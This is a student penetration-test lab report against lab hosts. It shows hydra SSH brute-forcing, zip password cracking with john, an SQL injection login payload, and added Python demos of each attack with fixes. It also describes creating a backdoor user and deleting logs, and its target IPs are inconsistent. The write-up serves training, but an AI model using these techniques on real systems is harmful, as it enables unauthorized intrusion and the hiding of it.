Internal Lab
David Elías Mayorga Velásquez
OSID: M3.Laboratorio
©
All rights reserved to Offensive Security, 2014
No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any
broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior
written permission from Offensive Security.
Table of Contents
1.0 Offensive Security Lab and Exam Penetration Test Report
1.1 Introduction
1.2 Objective
1.3 Requirements
2.0 Sample Report – High-Level Summary
2.1 Sample Report - Recommendations
3.0 Sample Report – Methodologies
3.1 Sample Report – Information Gathering
3.2 Sample Report – Service Enumeration
3.3 Sample Report – Penetration
3.4 Sample Report – Maintaining Access
3.5 Sample Report – House Cleaning
4.0 Additional Items Not Mentioned in the Report
1.0 Offensive Security Lab and Exam Penetration Test Report
1.1 Introduction
The Module Lab 3 and Exam penetration test report contains all efforts that were conducted in
order to pass the Offensive Security course. This report should contain all lab data in the report
template format as well as all items that were used to pass the overall exam. This report will be
graded from a standpoint of correctness and fullness to all aspects of the lab and exam. The
purpose of this report is to ensure that the student has a full understanding of penetration testing
methodologies as well as the technical knowledge to pass the qualifications for the Offensive
Security Certified Professional.
1.2 Objective
The objective of this assessment is to perform an internal penetration test against the Offensive
Security Lab and Exam network. The student is tasked with following a methodical approach in
obtaining access to the objective goals. This test should simulate an actual penetration test and
how you would start from beginning to end, including the overall report. An example page has
already been created for you at the latter portions of this document that should give you ample
information on what is expected to pass this course. Use the sample report as a guideline to get
you through the reporting.
1.3 Requirements
The student will be required to fill out this penetration testing report fully and to include the
following sections:
• Overall High-Level Summary and Recommendations (non-technical)
• Methodology walkthrough and detailed outline of steps taken
• Each finding with included screenshots, walkthrough, sample code, and
proof.txt if applicable.
• Any additional items that were not included
2.0 Sample Report – High-Level Summary
Welcome, agent. In this case there is little information we can supply you: our field agent has not made
contact and the "dead man device" was activated. This triggered all the alarms in the house, which is why
we have contacted you.
Your task: retrieve the information held by our field agent.
2.1 Sample Report - Recommendations
It is recommended to fix and patch the vulnerabilities identified during testing to ensure that an
attacker cannot exploit these systems in the future.
Tools:
Internet
Google
OSINT Framework
FOCA
TOR
3.0 Sample Report – Methodologies
A widely adopted approach to penetration testing was used that is effective in testing how secure
the lab systems are. Below is a breakdown of how each of the individual vulnerabilities found was
identified and exploited.
3.1 Sample Report – Information Gathering
The information gathering portion of a penetration test focuses on identifying the scope of the
penetration test. The specific IP addresses were:
Lab Network
172.20.0.105
3.2 Sample Report – Service Enumeration
Target: 172.20.0.105
nmap -p- --open -T4 -v -n 172.20.0.105
Open ports found:
Web service (port 80) with a hidden login page (see 3.3)
Port 1235 open
3.3 Sample Report – Penetration
Vulnerability Exploited: Default administrator credentials on the web login
System Vulnerable: 172.20.0.150/login.html
Vulnerability Explanation: Brute-forcing the web login consists of automating the login process
against the service and issuing login requests until a valid username/password combination is
found. This vulnerability is caused by poor practices during configuration of the tool, which
allow logging in as a valid user with guessable credentials.
Vulnerability Fix: To resolve this vulnerability, remote access from the WAN must be denied for
the administrator user "root"; if such access is necessary, use passwords that meet the
requirements of a strong password, and add rate limiting or account lockout on the login so
that automated guessing is detected and stopped.
Severity: Critical
Proof of Concept Code Here: We ran a dictionary attack against the service with a list of
possible usernames and passwords.
Screenshots:
Flags obtained:
Vulnerability Exploited: Default administrator credentials on SSH
System Vulnerable: 172.20.0.150:22
Vulnerability Explanation: Brute-forcing the SSH login consists of automating the login process
against the service and issuing login requests until a valid username/password combination is
found. This vulnerability is caused by poor practices during configuration of the service, which
allow logging in as a valid user with guessable credentials.
On the machine's SSH service the user "root" can be obtained with default credentials, which
hands over full control of the machine and the list of users with their respective passwords.
Vulnerability Fix: To resolve this vulnerability, remote SSH access for the administrator user
"root" must be denied (PermitRootLogin no); if such access is necessary, use passwords that meet
the requirements of a strong password, or better, key-based authentication only.
Severity: Critical
Proof of Concept Code Here: We ran a dictionary attack against the service with a list of
possible usernames and passwords (the same wordlist is used for logins and passwords, giving
6 x 6 = 36 attempts).
┌──(root💀kali)-[/home/kali/Desktop]
└─# hydra -L ./wordlist -P ./wordlist ssh://172.20.0.150
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret
service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and
ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-28 14:32:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce
the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:6/p:6), ~3 tries per task
[DATA] attacking ssh://172.20.0.150:22/
[22][ssh] host: 172.20.0.150 login: root password: root
[22][ssh] host: 172.20.0.150 password: root
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-28 14:33:05
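The dictionary attack described in the two findings above (web login and SSH) is a loop over every login/password pair, exactly what `hydra -L wordlist -P wordlist` does. The following is an added example, not code from the original report: a simulated login service with a constructed user database and a constructed six-word list (so, like the hydra run, 36 attempts), attacked once with no lockout and once with the lockout the fix recommends. The users, passwords and the lockout threshold are assumptions chosen for the demonstration.

```python
"""Dictionary attack against a simulated login service, with and without account lockout.

Added example; not part of the original report. The service, the user database and the
wordlist are constructed here (assumptions), so it runs offline with no target.
"""
import hashlib
import hmac
import itertools
import os


def _hash_pw(salt: bytes, password: str) -> bytes:
    """Salted SHA-256, enough for the demo (a real service would use bcrypt/scrypt/argon2)."""
    return hashlib.sha256(salt + password.encode()).digest()


_SALT = os.urandom(16)
# Constructed user database: username -> (salt, digest).
USERS = {
    "root": (_SALT, _hash_pw(_SALT, "root")),              # default credential, as in the finding
    "dolbuckfb": (_SALT, _hash_pw(_SALT, "Tr0ub4dor&3")),  # hypothetical strong password
}

# Constructed wordlist, used for both logins and passwords like hydra -L list -P list.
WORDLIST = ["admin", "user", "password", "123456", "dolbuckfb", "root"]


class LoginService:
    """Minimal login endpoint. lockout_threshold=None is the weak configuration (no lockout)."""

    def __init__(self, lockout_threshold=None):
        self.lockout_threshold = lockout_threshold
        self.failures = {}   # username -> consecutive failed attempts
        self.attempts = 0    # total login requests seen (what the server log would show)

    def login(self, user: str, password: str) -> bool:
        self.attempts += 1
        if (self.lockout_threshold is not None
                and self.failures.get(user, 0) >= self.lockout_threshold):
            return False  # account locked: reject without even checking the password
        rec = USERS.get(user)
        if rec is None:
            ok = False
        else:
            salt, digest = rec
            ok = hmac.compare_digest(_hash_pw(salt, password), digest)
        self.failures[user] = 0 if ok else self.failures.get(user, 0) + 1
        return ok


def dictionary_attack(service: LoginService, logins, passwords):
    """Try every login/password pair; return the valid pairs found, in the order found."""
    found = []
    for user, pw in itertools.product(logins, passwords):
        if service.login(user, pw):
            found.append((user, pw))
    return found


if __name__ == "__main__":
    weak = LoginService()
    print("no lockout :", dictionary_attack(weak, WORDLIST, WORDLIST), weak.attempts, "tries")
    # -> [('root', 'root')] 36 tries
    hardened = LoginService(lockout_threshold=3)
    print("lockout=3  :", dictionary_attack(hardened, WORDLIST, WORDLIST), hardened.attempts, "tries")
    # -> [] 36 tries  (root locked after 3 failures before 'root' is tried)
```

Note that lockout alone lets an attacker lock out legitimate users, and the strong password for dolbuckfb is what actually defeats the attack in both runs; on the real service the equivalent controls are `PermitRootLogin no`, key-based authentication and a rate limiter such as fail2ban.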
Screenshots:
Flags obtained:
Considering that root access has already been obtained and I already have control of the machine
and its users, I will avoid logging in as each user and go straight to revealing the 5 flags.
• flagadmin.txt
• Flagsmb.txt
• Flagftp.txt
• flagdolbuck.txt
• Comp.txt
Once the zip has been located, it is copied to the attacking machine and its password cracked:
root@ubuntu:/home# locate comprimido.zip
/home/comprimido.zip
/home/dolbuckfb/comprimido.zip
/var/www/html/comprimido.zip
┌──(kali㉿kali)-[~]
└─$ scp [email protected]:/home/dolbuckfb/comprimido.zip .
[email protected]'s password:
comprimido.zip 100% 270 1.0KB/s 00:00
┌──(kali㉿kali)-[~]
└─$ zip2john comprimido.zip > hash.txt
ver 1.0 efh 5455 efh 7875 comprimido.zip/comp.txt PKZIP Encr: 2b chk, TS_chk, cmplen=88,
decmplen=76, crc=D543286C ts=8445 cs=8445 type=0
┌──(kali㉿kali)-[~]
└─$ john hash.txt --show
comprimido.zip/comp.txt:123456789:comp.txt:comprimido.zip::comprimido.zip
1 password hash cracked, 0 left
The archive is opened with the recovered password "123456789".
Vulnerability Exploited: SQL injection (MySQL) in the web login and an exposed hidden login.
System Vulnerable: 172.20.0.150
Vulnerability Explanation: Every web application is exposed to probing and SQL injection
attacks. While scanning the website hosted on port 80, a login form was identified that is
vulnerable to SQL injection, allowing access to the portal as administrator; the administrator
password was also weak. In addition, inspection of the site revealed exposed documents
containing credentials of valid users for the Samba and SSH services.
Note that the main page contains a hidden button that exposes another path to a secret login;
it is reached by altering the HTML code or by copying the redirect target.
Vulnerability Fix:
For the SQL injection, the application code must be changed so that login input is never
concatenated into the SQL statement: use parameterized queries (prepared statements) and
validate the input, so that a crafted username or password cannot alter the query and grant
unauthorized access.
Hidden paths must not be relied on for protection (they are trivially discovered in the HTML),
and users, especially administrators, must have strong passwords.
Severity: Critical
Proof of Concept Code Here:
• For access via SQL injection:
username: admin / password: 'or 0=0'
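The injection above works because the application pastes the password field into the SQL text, so the quote closes the string literal and `or 0=0` makes the WHERE clause true for every row. The following is an added example, not code from the original report or from the target application: an in-memory SQLite table with constructed users, the injectable query next to the parameterized one the fix calls for, and a payload written as `' or 0=0 -- ` (a variant of the report's payload with a trailing comment, which is an assumption about the target's query shape since the original query was not captured).

```python
"""SQL injection in a login query: string concatenation next to a parameterized query.

Added example; not part of the original report. Uses an in-memory SQLite table with
constructed users (plaintext passwords only to keep the demo short; a real application
stores password hashes).
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret-not-guessable"), ("dolbuckfb", "hunter2")])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Injectable: the input is spliced into the SQL text, so a quote in the password
    ends the literal and whatever follows is executed as SQL."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username: str, password: str):
    """Parameterized: the driver binds the values as data; they are never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Closes the password literal, ORs in an always-true condition, comments out the rest.
# Resulting WHERE in the vulnerable query:
#   username = 'admin' AND password = '' or 0=0 -- '
PAYLOAD = "' or 0=0 -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login as admin with payload:", login_vulnerable(db, "admin", PAYLOAD))
    print("fixed login as admin with payload:     ", login_fixed(db, "admin", PAYLOAD))
    print("fixed login with the real password:    ",
          login_fixed(db, "admin", "s3cret-not-guessable"))
```

The same payload returns a row from `login_vulnerable` and nothing from `login_fixed`; the only difference between the two functions is whether the user's text becomes part of the statement or is passed as a bound parameter.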
Screenshot Here:
Document with hashes found at 172.20.0.150/secret (hashes cracked)
SSH connection with a valid user (dolbuckfb flag obtained, plus comprimido.zip containing the comp
flag)
Hidden repositories (ftp flag obtained)
Samba connection (smb flag obtained)
3.4 Sample Report – Maintaining Access
With the root and user credentials already in hand, access can be maintained with a low profile;
should the passwords be changed, a user with privileges is created to keep access to the system.
3.5 Sample Report – House Cleaning
Once the process is complete, all logs and files that may contain records of our movements inside
the machine are deleted. On a real engagement this cleanup is limited to the artifacts the tester
introduced (added users, uploaded files) and is agreed with the client rather than wiping logs.
4.0 Additional Items Not Mentioned in the Report